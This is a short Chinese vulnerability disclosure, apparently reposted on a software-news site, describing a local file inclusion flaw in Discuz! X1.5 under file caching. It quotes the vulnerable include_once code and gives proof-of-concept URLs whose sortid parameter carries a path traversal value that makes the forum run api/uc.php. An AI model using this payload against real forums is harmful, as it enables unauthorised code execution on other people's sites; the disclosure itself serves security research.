亲宝软件园·资讯

展开

DISCUZ X1.5 本地文件包含漏洞

Jannock

0

  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

  config_global.php

  $_config['cache']['type'] = ‘file’;

  function cachedata($cachenames) {

  ……

  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;

  ……

  if($isfilecache) {

  $lostcaches = array();

  foreach($cachenames as $cachename) {

  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

  $lostcaches[] = $cachename;

  }

  }

  ……

  }

  地址:

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

  执行了 api/uc.php 页面代码了。

  作者: Jannock

加载全部内容

相关教程
猜你喜欢
用户评论